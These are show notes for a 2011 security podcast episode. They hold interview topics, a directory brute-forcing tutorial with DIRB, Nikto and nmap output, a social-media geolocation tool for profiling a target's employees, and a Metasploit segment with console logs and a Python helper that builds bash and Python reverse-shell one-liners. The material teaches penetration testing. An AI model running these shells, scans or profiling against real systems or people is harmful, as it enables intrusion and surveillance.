- 1 Announcements & Shameless Plugs
- 2 Kick off with Johnny Long
- 3 Marcus Ranum Interview
- 4 The Stogie Geeks Podcast
- 5 Ron Gula Interview
- 6 Tech Segment: Concealing Storage in Windows Volume Shadow Copy Service
- 7 Robert Graham Interview
- 8 Tech Segment: Pushpin Release
- 9 Tech Segment: Busting Directories: Dirbuster and Alternatives
- 10 Kevin Mitnick Interview
- 11 Tech Segment: Anti Review
- 12 HackNaked TV/ PaulDotCom Espanol /Dinner Break
- 13 Tech Segment: Google Hacking Diggity Project
- 14 Ancient alien beings, hypervisors and virtualization
- 15 Tech Segment: New ways to Persist with Metasploit
- 16 Pen Testing War Stories with Kevin Fiscus
- 17 Drunken Security News
Announcements & Shameless Plugs
PaulDotCom Security Weekly - Episode 265: the Hackers for Charity twelve-hour podcast, Friday, October 28th, 2011.
- Check out Hack Naked TV
- Friday October 28th is our 12 hour podcast for Hackers for Charity - we have a special interview with Johnny Long, Kevin Mitnick and other special guests in the works.
- Larry is teaching SEC580 Metasploit Kung Fu for Enterprise Pen Testing in San Antonio, TX December 4-5. Tell them (and us) that we sent you! Want to go in general? How about 10% off? Use the discount code Larry-SA10
- Don't forget to Read our blog, Participate on our mailing list, Visit PaulDotCom Insider, Follow us on Twitter, Join the IRC channel at irc.freenode.net #pauldotcom, Watch our Videos and Add us on Facebook where we can be "friends"
- BSides, BSides, BSides everywhere
The HFC group:
- Feeds children through a "food for work" program.
- Builds computer labs to help students learn skills and land jobs that are key to disrupting poverty's vicious cycle.
- Provides technical assistance to charities that can't afford IT services.
- Provides job experience and references to the Ugandan volunteers.
You can donate or get more involved via the Hackers for Charity website.
Kick off with Johnny Long
10 AM EDT
Johnny calls in to update us on his Hackers for Charity project.
Marcus Ranum Interview
- Marcus, what's the latest on cyberwar? Has stuxnet changed some of your views on Cyberwar?
- Speaking of SCADA, what can we do to improve the security of SCADA systems? It seems every month there is a new "SCADA hack" and vendors and organizations that aren't paying attention to security.
- Penetration tests are successful, and one of the primary ways in which we are gaining access to systems is through "client-side attacks". Essentially, we are tricking the user into running code, no vulnerabilities or "exploits" required. What can organizations do to protect against this threat?
- Speaking of vulnerabilities, there still seems to be a mindset in the community of "become vulnerable, exploit, apply patch, rinse, repeat". What can we do to shift people away from the "patch mindset" to defensive measures that actually work?
- Speaking of defensive measures, what are your thoughts on "smart firewalls"? Are they still the stop-gap measure that is masking the real problems?
The Stogie Geeks Podcast
Hosts: Paul Asadoorian & Tim "Bugbear" Mugherini
Noon - 1PM
Paul & Tim will smoke some cigars and tell you all about them, talk about what they've been smoking, and feature a "Stogie How-To" segment titled "The Top Ten Things You Should Not Do With Your Humidor".
Ron Gula Interview
10 Things You Shouldn't Do For Cyber-Security Awareness Month - According to the Department of Homeland Security, October 2011 is National Cyber Security Awareness Month. With the best intentions, I've laid out ten items that you shouldn't do in an attempt to raise awareness. I've seen these items backfire, cause disruption, and raise awareness of how security can make our lives less convenient and only questionably more secure.
Ron's Top Ten List:
10 – Perform a Client Side Penetration Test
9 – Switch to IPv6
8 – Learn Government Compliance Standards
7 – Read Computer Security Related Books of Fiction and Fact
6 – Engage in a religious debate about the most secure OS, phone or Web Browser
5 – Run a Honeypot
4 – Blame any attacks or virus outbreaks on China
3 - Publish lists of People’s Cracked Passwords
2 – Patch all of those systems that haven’t been patched in a long while
1 - Turn off your Anti-Virus Product
Tech Segment: Concealing Storage in Windows Volume Shadow Copy Service
Authors: Mark Baggett and Tim "LaNMaSteR53" Tomes
Check out their presentation here
You can download the tool here: tools.lanmaster53.com/vssown.vbs
Robert Graham Interview
- How did you get your start in information security?
- Tell us about what you learned about Occupy Wall Street
- What is your policy on disclosure and what are the merits to Digital Bond's policy?
- What can Apple do to improve the security of its products?
Tech Segment: Pushpin Release
One of the better aspects of penetration testing is tying together a variety of different attack vectors to make something beautiful and unique. For example, doing some research on a target and tailoring a custom spear-phish attack for them.
However, one of the things we have been working on lately is geo-location tied with social networking. To that end we are releasing pushpin.py. To run pushpin you specify a latitude, a longitude, and a radius in kilometers. What pushpin provides is all of the tweets, YouTube videos and Flickr pictures from within that radius.
How can this be useful in a test? What you can do is first create a list of users and possible email addresses from a target organization. This can be done through Maltego, Google hacking, Jigsaw or LinkedIn. Next, take each of the accounts and users that were discovered and see if they have accounts with Twitter, YouTube or Flickr. You would be shocked to discover just how many people associate their work email with their social media. Once you have identified the accounts that are being used, you can then use pushpin to see if they have posted pictures, videos or tweets in the area near their place of employment.
Odds are, they have.
Next, start harvesting in that area and searching the output for your target accounts. This gives you a very good idea of the places they visit, and in some situations, you can even get a few pictures or a video of the inside of the office.
While Ethan did an outstanding job of starting the tool, we are currently looking for some people to help extend it and incorporate additional sites and geolocation data. Please see the source code of the tool for more info.
Get it here
BTW, want to get the latitude and longitude of an address from Google Maps? Try this: http://itouchmap.com/latlong.html
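As an aside, the core of what pushpin does with that latitude/longitude/radius input is a great-circle distance check against each geotagged post. A minimal standalone sketch of that filter (hypothetical helper names, not pushpin's actual code):

```python
import math

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometers."""
    r = 6371.0  # mean Earth radius in km
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def within_radius(center, point, radius_km):
    """True if point (lat, lon) falls inside the search radius around center."""
    return haversine_km(center[0], center[1], point[0], point[1]) <= radius_km

# A point roughly 0.8 km west of the center is well inside a 5 km radius
print(within_radius((41.82, -71.41), (41.82, -71.42), 5))
```

Every tweet, video, or photo with coordinates inside the radius gets kept; everything else is discarded.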
Tech Segment: Busting Directories: Dirbuster and Alternatives
Author: Larry Pesce
Ok, we've covered DirBuster before. One advantage of DirBuster is the GUI (yeah, Girls Use It). Another is the ability to brute force directories and files without a wordlist…and, depending on the options, have it take forever.
So what happens if you want to do it from the command line?
Well, we can still use DirBuster from the command line, but it is not documented terribly well. Let's get some better documentation:
java -jar DirBuster-0.12.jar -h

Usage: java -jar DirBuster-1.0-RC1 -u <URL http://example.com/> [Options]

Options:
 -h : Display this help message
 -H : Start DirBuster in headless mode (no gui), report will be auto saved on exit
 -l <Word list to use> : The Word list to use for the list based brute force. Default: /Users/larry/Desktop/DirBuster-1.0-RC1/directory-list-2.3-small.txt
 -g : Only use GET requests. Default Not Set
 -e <File Extention list> : File Extention list eg asp,aspx. Default: php
 -t <Number of Threads> : Number of connection threads to use. Default: 10
 -s <Start point> : Start point of the scan. Default: /
 -v : Verbose output, Default: Not set
 -P : Don't Parse html, Default: Not Set
 -R : Don't be recursive, Default: Not Set
 -r <location> : File to save report to. Default: /Users/larry/Desktop/DirBuster-1.0-RC1/DirBuster-Report-[hostname]-[port].txt
Ok, so now we can begin to put together some command line options:
java -jar DirBuster-1.0-RC1.jar -u http://www.somesite.com -H -r output.txt
In this case we have started it with -H for headless operation (don't start the GUI). In order to save some typing, we have also omitted the -l switch (to use the default wordlist). What if we want to brute force filenames as well?
java -jar DirBuster-1.0-RC1.jar -u http://www.somesite.com -H -r output.txt -e asp,aspx,html,htm
Now there are a few interesting caveats with this. First off, DirBuster is Java, which can be a little heavy, and I haven't been able to make headless mode work well or reliably. Sure, it will run anywhere, but it is Java. There is also no real-time feedback on the command line, and from what I've seen, reporting may require parsing XML. Yuck. How about a different command line option?
Enter DIRB. It is command line only and has most of the functionality of DirBuster, but without the overhead of Java or a GUI. The only feature I cannot find is the ability to brute force without a wordlist.
It should compile on just about any POSIX system that has access to libcurl. It installed without issue on my OS X and Ubuntu systems; I believe libcurl was already installed in both cases for other projects.
So, let's see how it works:
$ ./dirb http://www.somesite.com ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt

-----------------
DIRB v2.03
By The Dark Raver
-----------------

START_TIME: Wed Oct 26 10:18:42 2011
URL_BASE: http://www.somesite.com/
WORDLIST_FILES: ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt

-----------------

GENERATED WORDS: 4712

---- Scanning URL: http://www.somesite.com/ ----
+ http://www.somesite.com// (FOUND: 200 [Ok] - Size: 29435)
+ http://www.somesite.com/Admin/ ==> DIRECTORY
+ http://www.somesite.com/aspnet_client (FOUND: 403 [Forbidden] - Size: 218)
+ http://www.somesite.com/components/ ==> DIRECTORY
+ http://www.somesite.com/config/ ==> DIRECTORY
+ http://www.somesite.com/controls/
…
Pretty simple, eh?
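Under the hood, every one of these busters is doing the same basic thing: combining a wordlist with optional extensions into candidate paths and requesting each one. A toy sketch of the candidate generation (illustrative only, not how DIRB or DirBuster is actually implemented):

```python
import itertools

def generate_candidates(words, extensions=None):
    """Build the candidate paths a directory buster would request."""
    paths = ["/%s/" % w for w in words]                  # directory guesses
    for w, ext in itertools.product(words, extensions or []):
        paths.append("/%s%s" % (w, ext))                 # filename guesses
    return paths

# Two words and two extensions: 2 directory guesses + 4 filename guesses
print(len(generate_candidates(["admin", "config"], [".asp", ".html"])))  # 6
```

This is also why adding extensions gets expensive fast: the request count is the wordlist size times (1 + number of extensions).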
We can also use it to brute force filenames, and we give the extensions we want to test with the -X switch, based on the words in the wordlists specified:
$ ./dirb http://www.somesite.com ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt -X .asp,.aspx,.html,.htm

-----------------
DIRB v2.03
By The Dark Raver
-----------------

START_TIME: Wed Oct 26 10:25:52 2011
URL_BASE: http://www.somesite.com/
WORDLIST_FILES: ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt
EXTENSIONS_LIST: (.asp,.aspx,.html,.htm) | (.asp)(.aspx)(.html)(.htm) [NUM = 4]

-----------------

GENERATED WORDS: 4712

---- Scanning URL: http://www.somesite.com/ ----
--> Testing: http://www.somesite.com/2002.htm
…
$ ./dirb http://www.somesite.com ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt -o outfile.txt -S
We need the -S for silent to make the report readable…and of course this can be combined with the extension brute forcing as well:
$ ./dirb http://www.somesite.com ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt -X .asp,.aspx,.html,.htm -o outfile.txt -S
The -S is really needed. Why? If it is not included, the log includes EVERY test that was run against the host, successful or not. With the -S (silent) switch, only the successful finds are included, both at the terminal and in the log. Oh, and the report is in plain text, great for additional reporting and/or post-processing with Unix text tools.
As for real-time feedback, that happens too, including status codes and the size of the pages returned. That's helpful for separating unusual pages from standard responses such as "Directory Listing not allowed" or 30x redirects.
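If you do end up with a noisy log, a few lines of text processing will pull the hits back out. A sketch that assumes the plain-text report format shown in the output above:

```python
import re

def found_entries(report_text):
    """Pull (url, status) pairs for FOUND lines, plus discovered directories."""
    hits = re.findall(r"\+ (\S+) \(FOUND: (\d+)", report_text)
    dirs = re.findall(r"\+ (\S+) ==> DIRECTORY", report_text)
    return hits, dirs

sample = """+ http://www.somesite.com/aspnet_client (FOUND: 403 [Forbidden] - Size: 218)
+ http://www.somesite.com/Admin/ ==> DIRECTORY
--> Testing: http://www.somesite.com/2002.htm"""

hits, dirs = found_entries(sample)
print(hits)  # the "Testing:" noise lines are dropped
```

The same regexes work equally well in grep or awk if you'd rather stay in the shell.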
One other helpful switch I found is -i. This launches a case-insensitive search and can cut down on the number of requests, especially when headed to an IIS system or Apache on Windows (yeah, Windows is case insensitive, unlike POSIX OSes). One way I like to determine webserver type is the Firefox plugin "Header Spy", which places the Server header in the bottom bar of the browser. Of course, this is not completely accurate, and it does not reliably identify Apache on Windows.
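The reason -i saves requests: on a case-insensitive filesystem, /Admin and /admin are the same resource, so wordlist entries differing only by case are wasted requests. The equivalent wordlist dedupe, as a sketch:

```python
def dedupe_case_insensitive(words):
    """Collapse wordlist entries that differ only by case, keeping order."""
    seen, out = set(), []
    for w in words:
        key = w.lower()
        if key not in seen:
            seen.add(key)
            out.append(w)
    return out

words = ["Admin", "admin", "ADMIN", "images", "Images"]
print(dedupe_case_insensitive(words))  # 5 requests become 2
```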
So, let's find another way around that using command line tools.
Yay nmap, and thanks to Ron Bowes for the http-headers NSE script. Let's fire this off like so:
Hiroshige:~ lpesce$ nmap -sV --script=http-headers -p 80 www.healthcomp.com

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-27 16:44 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.06 seconds

Hiroshige:~ lpesce$ nmap -sV --script=http-headers -p 80 www.somesite.com

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-27 16:46 EDT
Nmap scan report for www.somesite.com (184.108.40.206)
Host is up (0.067s latency).
rDNS record for 220.127.116.11: 208-87-35-101.securehost.com
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-headers:
|   Date: Thu, 27 Oct 2011 20:46:42 GMT
|   Server: Apache/2.2.17 (Ubuntu)
|   X-Powered-By: PHP/5.3.5-1ubuntu7.2
|   Set-Cookie: uid=www4ea9c332892637.06471309; expires=Sat, 26-Nov-2011 20:46:42 GMT
|   Vary: Accept-Encoding
|   Connection: close
|   Content-Type: text/html
|   Set-Cookie: WEB=W3; path=/
|
|_  (Request type: HEAD)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.73 seconds
In this case we've got Apache on Ubuntu. No need for the DIRB -i switch here.
$ nmap -sV --script=http-headers -p 80 www.someothersite.org

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-27 16:49 EDT
Nmap scan report for www.carene.org (18.104.22.168)
Host is up (0.019s latency).
rDNS record for 22.214.171.124: www.someothersite.org
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.0
| http-headers:
|   Content-Type: text/html; charset=UTF-8
|   Server: Microsoft-IIS/7.0
|   Set-Cookie: CFID=54754419;expires=Sat, 19-Oct-2041 20:49:14 GMT;path=/
|   Set-Cookie: CFTOKEN=42783161;expires=Sat, 19-Oct-2041 20:49:14 GMT;path=/
|   X-Powered-By: ASP.NET
|   Date: Thu, 27 Oct 2011 20:49:14 GMT
|   Connection: close
|
|_  (Request type: HEAD)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.12 seconds
This one would be a good candidate for the -i switch.
$ nmap -sV --script=http-headers -p 80 192.168.10.19

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-27 17:56 EDT
Nmap scan report for 192.168.10.19
Host is up (0.0042s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.21 ((Win32))
| http-headers:
|   Date: Thu, 27 Oct 2011 21:56:31 GMT
|   Server: Apache/2.2.21 (Win32)
|   Last-Modified: Sat, 20 Nov 2004 18:16:24 GMT
|   ETag: "200000001bcee-2c-3e9549efc6e00"
|   Accept-Ranges: bytes
|   Content-Length: 44
|   Connection: close
|   Content-Type: text/html
|   X-Pad: avoid browser bug
|
|_  (Request type: HEAD)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.60 seconds
As would this one.
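If you want to make the case-sensitivity call from a script instead of eyeballing headers, a crude heuristic on the Server header works most of the time (a hypothetical helper; remember headers can be spoofed or stripped):

```python
def likely_case_insensitive(server_header):
    """Guess whether the filesystem behind the server ignores case."""
    s = server_header.lower()
    if "microsoft-iis" in s or "win32" in s or "win64" in s:
        return True   # IIS, or Apache built for Windows
    return False      # assume a case-sensitive POSIX filesystem

print(likely_case_insensitive("Apache/2.2.21 (Win32)"))   # True: use -i
print(likely_case_insensitive("Apache/2.2.17 (Ubuntu)"))  # False: skip -i
```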
Ok, so the only issue I'm finding with DIRB is the inability to do directory discovery and then filename-with-extension discovery inside the newly found directories. It appears to be one or the other.
Yes, you can do directory brute forcing with Nikto as well. Did you know that? Neither did I. It does require Perl and a list of directories to be scanned; in this case I've used one from DIRB, as Nikto does not ship with one.
While it may not be as configurable, it does perform a bunch of additional tests that can give a bunch of other interesting information. Let's get it rockin':
First, command line options:
perl ./nikto.pl

- Nikto v2.1.4
---------------------------------------------------------------------------
+ ERROR: No host specified

   -config+            Use this config file
   -Cgidirs+           scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
   -dbcheck            check database and other key files for syntax errors
   -Display+           Turn on/off display outputs
   -evasion+           ids evasion technique
   -Format+            save file (-o) format
   -host+              target host
   -Help               Extended help information
   -id+                Host authentication to use, format is id:pass or id:pass:realm
   -list-plugins       List all available plugins
   -mutate+            Guess additional file names
   -mutate-options+    Provide extra information for mutations
   -output+            Write output to this file
   -nocache            Disables the URI cache
   -nossl              Disables using SSL
   -no404              Disables 404 checks
   -port+              Port to use (default 80)
   -Plugins+           List of plugins to run (default: ALL)
   -root+              Prepend root value to all requests, format is /directory
   -ssl                Force ssl mode on port
   -Single             Single request mode
   -timeout+           Timeout (default 2 seconds)
   -Tuning+            Scan tuning
   -update             Update databases and plugins from CIRT.net
   -vhost+             Virtual host (for Host header)
   -Version            Print plugin and database versions
   + requires a value

Note: This is the short help output. Use -H for full help.
Now some usage:
$ perl nikto.pl -mutate 6 -mutate-options small.txt -output outpput.txt -host www.somesite.com

- Mutate is deprecated, use -Plugins instead
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          10.14.171.123
+ Target Hostname:    www.somesite.com
+ Target Port:        80
+ Using Mutation:     Attempt to guess directory names from the supplied dictionary file
+ Start Time:         2011-10-28 21:27:58
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ERROR: Unable to open dictionary file : No such file or directory.
+ robots.txt contains 1 entry which should be manually viewed.
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://192.168.254.10/images/".
+ ETag header found on server, fields: 0xa05cd8197221cc1:2902
+ Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0 for Win2k, current is at least 7.5)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
…
Pretty cool eh?
I'd never heard of http-dir-enum, and at an initial stab it seems to be the least robust of the options, but it is an option nonetheless. This one requires Perl as well.
First a little cmd line love:
perl ./http-dir-enum.pl

http-dir-enum v0.4.2 ( http://portcullis-security.com/16.php )
Copyright (C) 2006 Mark Lowe ( firstname.lastname@example.org )

Given a URL and a wordlist, http-dir-enum will attempt to determine names of directories that exist on a website.

Usage: http-dir-enum.pl [options] -f dir-file url

options are:
        -m n     Maximum number of worker processes (default: 8)
        -f file  File of potential directory names
        -k file  File of known directory names
        -c 0|1   Close connection between each attempt (default: 0)
        -r 0|1   Recursively enumerate sub directories (default: 1)
        -t n     Wait a maximum of n seconds for reply (default: 20)
        -u user  Username to use for basic authentication
        -p pass  Password to use for basic authentication
        -H g|h   HTTP method g=GET, h=HEAD (default: head)
        -i code  Ignore HTTP response code (e.g. 404 or '404|200')
        -U str   Set User-Agent header to str (default based on Firefox 126.96.36.199/Linux)
        -s 0|1   Add a trailing slash to the URL (default: 1)
        -S 0|1   Case sensitive directory names (default: 1)
        -a 0|1   Automatically determine HTTP response code to ignore (default: 1)
        -l n     Limit scan to n attempts per second (default: unlimited)
        -R 0|1   Follow redirects (default: 0)
        -q       Quiet. Don't print out info ("[I]") messages
        -n n     Only read first n lines of dirs file (default: unlimited)
        -o file  Save XML report of dirs found to file (default: don't save a report)
        -x regx  Return only results that match this regular expression
        -X regx  Ignore results that match this regular expression
        -P url   Proxy URL
        -C str   Use cookie
        -v       Verbose
        -d       Debugging output
        -D code  Print out whole response if it has HTTP code "code" (e.g. 500)
        -h       This help message

The default options should be suitable most of the time, so the typical usage would be:

        http-dir-enum.pl -f dirs.txt http://host
Well, 2006 eh? I suppose not much has really changed, except for maybe needing an updated directory file, which it includes. For me, the bad part? XML output. Well, let's give it a go:
$ perl ./http-dir-enum.pl -o output.xml -f directory-names.txt http://www.healthcomp.com

Starting http-dir-enum v0.4.2 ( http://portcullis-security.com/16.php )
Copyright (C) 2006 Mark Lowe ( email@example.com )

----------------------------------------------------------
|                    Scan Information                    |
----------------------------------------------------------

URL .................... http://www.somesite.com
Processes .............. 8
Directory name file .... directory-names.txt
Query timeout .......... 20 secs
HTTP Method ............ HEAD
Max Queries / sec ...... unlimited
Trailing slash ......... On
Recursive dir search ... On
Close connections ...... Off
Follow redirects ....... Off
Case sensistive dirs ... On
Auto-ignore ............ On
Output file ............ output.xml

######## Scan started on Thu Oct 27 21:49:23 2011 #########
[I] Processing directory: / (0 dirs remaining)
[I] Auto-ignoring HTTP code 404 for http://www.somesite.com
admin 403
documentation 403
images 403
config 403
aspnet_client 403
…
Well, if it isn't terribly robust, at least it is in Perl and easily modified, and it is yet another option.
That is all I've got, have fun busting directories.
Kevin Mitnick Interview
Tech Segment: Anti Review
Let's take a look at the Anti Android attack tool from Zimperium.
HackNaked TV/ PaulDotCom Espanol /Dinner Break
Tech Segment: Google Hacking Diggity Project
Author: Jack "Tenacious" Daniel
Ancient alien beings, hypervisors and virtualization
Your host for this journey will be none other than Eric Fiterman!
"Researchers in Central America recently discovered an ancient underground lake containing many new discoveries about the Mayan civilization. Among these discoveries were many mysterious glyphs depicting what appear to be other-worldly beings handing compact disks to Mayan priests. Excavation unearthed some ancient, but usable, compact disks, containing what appeared to be bootable Linux environments designed to reset passwords in VMware's ESX hypervisor. Eric Fiterman, of Rogue Networks, has extensively studied the artifacts from the project, and has learned that ancient alien beings may have given humans knowledge of hypervisors and virtualization long ago.
Eric believes that virtualization and computing were ancient technologies used by the Mayans, and that among this lost knowledge were the secrets of how to recover VMware hypervisor systems without a password. Eric will be discussing this recently discovered artifact, and is releasing a bootable ISO that allows users to restore ESX systems without re-installing the hypervisor."
Tech Segment: New ways to Persist with Metasploit
Author: Carlos "DarkOperator" Perez
Recently at DerbyCon I saw Egypt giving a demo to several of the students in his class, covering the point that once you get a shell on a system, one of the first actions to take is to make sure you have a secondary one, since breaking a shell is quite easy. I have to say I agree, especially when one is going to interact with it. I saw him demo my multi_meter_inject script, which I wrote with the initial purpose of sending an x86 Meterpreter session to a colleague or group of colleagues by injecting the Meterpreter x86 payload into a process's memory and executing it. After seeing him fight a bit on x64 systems, since the script/post module was designed for x86 systems and Meterpreter only, the limitations were showing. So on the flight back to PR I wrote a new version with several checks and controls, expanded to work not only with Meterpreter but with other Windows payloads, and added support and checks for x64 systems. This module is called payload_inject. The experience from this module was used to port the persistence script into a post module, so you can place a Meterpreter payload on a target in a persistent manner. Due to the limitation that the payload must be converted into a VBS script to give it its persistent qualities, this one is limited to the x86 version of Meterpreter, but I extended it to check for existing listeners and to provide more options, especially for payloads like the new Meterpreter HTTP and HTTPS versions. I also wrote a module for Unix and Linux systems that uses whatever scripting environment is installed on the system to create a one-liner reverse TCP shell, using code from the reverse shell cheat sheet at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet (a link tweeted by Chris John Riley), so that nothing is actually written to disk and the session resides in memory.
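The one-liners the system_session module builds all follow the same pentestmonkey pattern: a single interpreter invocation that connects back to the listener and wires a shell to the socket, with nothing written to disk. A sketch of how such command strings can be assembled (hypothetical helper functions, not the module's actual code; only run the resulting commands against systems you are authorized to test):

```python
def bash_reverse_oneliner(lhost, lport):
    """Build a bash reverse TCP shell one-liner for the given listener."""
    return "bash -i >& /dev/tcp/%s/%d 0>&1" % (lhost, lport)

def python_reverse_oneliner(lhost, lport):
    """Build the equivalent one-liner using Python's socket module."""
    return (
        "python -c 'import socket,subprocess,os;"
        "s=socket.socket();s.connect((\"%s\",%d));"
        "[os.dup2(s.fileno(),fd) for fd in (0,1,2)];"
        "subprocess.call([\"/bin/sh\",\"-i\"])'" % (lhost, lport)
    )

# Connect-back command strings for a listener on 192.168.1.100:4433
print(bash_reverse_oneliner("192.168.1.100", 4433))
```

The module's "auto" TYPE simply probes for each interpreter in turn and uses the first one found, as the run output below shows.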
We will start with some demo sessions, where session 1 is a FreeBSD 8.2 VM, session 2 is a Windows 7 machine in a domain, session 3 is a Windows 2003 machine, and session 4 is a Linux Ubuntu system.
sessions

Active sessions
===============

  Id  Type                   Information                                 Connection
  --  ----                   -----------                                 ----------
  1   shell bsd              SSH admin:Newsystem01 (192.168.1.134:22)    192.168.1.241:55187 -> 192.168.1.134:22
  2   meterpreter x86/win32  VICTIMLAB\administrator @ WIN701            192.168.1.100:4444 -> 192.168.1.138:23021
  3   meterpreter x86/win32  VICTIMLAB\Administrator @ WIN2K3LAB01       192.168.1.100:4444 -> 192.168.1.138:4340
  4   shell linux                                                        192.168.1.100:4448 -> 192.168.1.135:37211
Let's start with the most recent one, the system_session module, which uses the scripting environments present on a box. The environments supported are Ruby, Python, Perl, and Bash.
Let's start by selecting the module and looking at the options:
msf auxiliary(ssh_login) > use post/multi/manage/system_session
msf post(system_session) > show options

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)
Let's start with the case of letting the module select the first supported scripting environment and set up a remote session:
msf post(system_session) > set SESSION 1
SESSION => 1
msf post(system_session) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf post(system_session) > set HANDLER true
HANDLER => true
msf post(system_session) > run

[*] Starting exploit multi handler
[*] Started reverse handler on 192.168.1.100:4433
[*] Starting the payload handler...
[*] Python was found on target
[*] Python reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf post(system_session) >
[*] Command shell session 5 opened (192.168.1.100:4433 -> 192.168.1.134:60732) at 2011-10-28 15:03:39 -0400

msf post(system_session) > sessions

Active sessions
===============

  Id  Type                   Information                                 Connection
  --  ----                   -----------                                 ----------
  1   shell bsd              SSH admin:Newsystem01 (192.168.1.134:22)    192.168.1.241:55187 -> 192.168.1.134:22
  2   meterpreter x86/win32  VICTIMLAB\administrator @ WIN701            192.168.1.100:4444 -> 192.168.1.138:23021
  3   meterpreter x86/win32  VICTIMLAB\Administrator @ WIN2K3LAB01       192.168.1.100:4444 -> 192.168.1.138:4340
  4   shell linux                                                        192.168.1.100:4448 -> 192.168.1.135:37211
  5   shell bsd                                                          192.168.1.100:4433 -> 192.168.1.134:60732

msf post(system_session) >
msf post(system_session) > set SESSION 4
SESSION => 4
msf post(system_session) > set TYPE bash
TYPE => bash
msf post(system_session) > run

[*] Starting exploit multi handler
[-] Job 5 is listening on IP 192.168.1.100 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Bash reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf post(system_session) >
[*] Command shell session 6 opened (192.168.1.100:4433 -> 192.168.1.135:45662) at 2011-10-28 15:08:13 -0400

msf post(system_session) > sessions -i 6
[*] Starting interaction with 6...

bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
carlos@infidel02-dev:/home/carlos/Desktop$ uname -a
uname -a
Linux infidel02-dev 2.6.32-25-generic #45-Ubuntu SMP Sat Oct 16 19:48:22 UTC 2010 i686 GNU/Linux
carlos@infidel02-dev:/home/carlos/Desktop$ ^Z
Background session 6? [y/N] y
Pen Testing War Stories with Kevin Fiscus
Drunken Security News
(This segment can go anywhere during the 12 hours; it should last about an hour.)
- Why You Still Can’t Teach a Machine to Hack
- Pentesting iPhone Applications « SECURITYLEARN
- Security Onion: When is full packet capture NOT full packet capture?
- IBM Rational Application Security Insider: DNS poisoning via Port Exhaustion
- iPhone hacked into spiPhone to eavesdrop and track what you type on nearby PC - Computerworld Blogs
- 3 Words to Describe Enterprise Security
- Is a separate highly secure Internet needed?
- HowTo: vCenter alarm for root login
- Nightmare on Malware Street
- Windows XP becomes zombie tween - Computerworld Blogs
AWS almost pwnage - [Larry] - apparently due to some faulty crypto, attackers could have executed administrative tasks on any infrastructure. The basis for the attack was discovered in 2005, before AWS was even a glimmer.
Squid proxy vulns - [Larry] - I keep waiting for things like this, as I know of a bunch of things that use Squid proxy that would be loads of fun to pwn. I won't mention it, as it is an ongoing project for me, nor do I know if the information I have is still current. This may be one that reverts to the P in APT.
THC pwns SSL - [Larry] - Want to DoS an SSL-enabled website? This tool will let you do that, using built-in SSL re-negotiation. This feature was intended to keep things more secure, but can be used to do bad things as well.
10PM show over.